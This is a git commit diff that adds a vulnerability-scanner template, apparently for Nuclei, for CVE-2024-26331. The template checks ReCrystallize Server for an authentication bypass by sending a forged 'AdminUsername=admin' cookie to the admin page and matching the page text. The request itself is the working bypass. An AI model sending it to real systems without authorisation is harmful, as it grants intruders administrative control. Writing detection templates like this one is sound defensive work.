CVE-2024-26331
parent
1dd3635124
commit
d5165791fb
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2024-26331
|
||||
info:
|
||||
name: ReCrystallize Server Authentication Bypass via Cookie Manipulation
|
||||
author: Carson Chan
|
||||
severity: high
|
||||
reference: https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
|
||||
description: This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Admin/Admin.aspx"
|
||||
headers:
|
||||
Cookie: "AdminUsername=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "ReCrystallize Server Administration"
|
||||
- "License Status:"
|
||||
- "Fully Licensed."
|
||||
part: body
|
Loading…
Reference in New Issue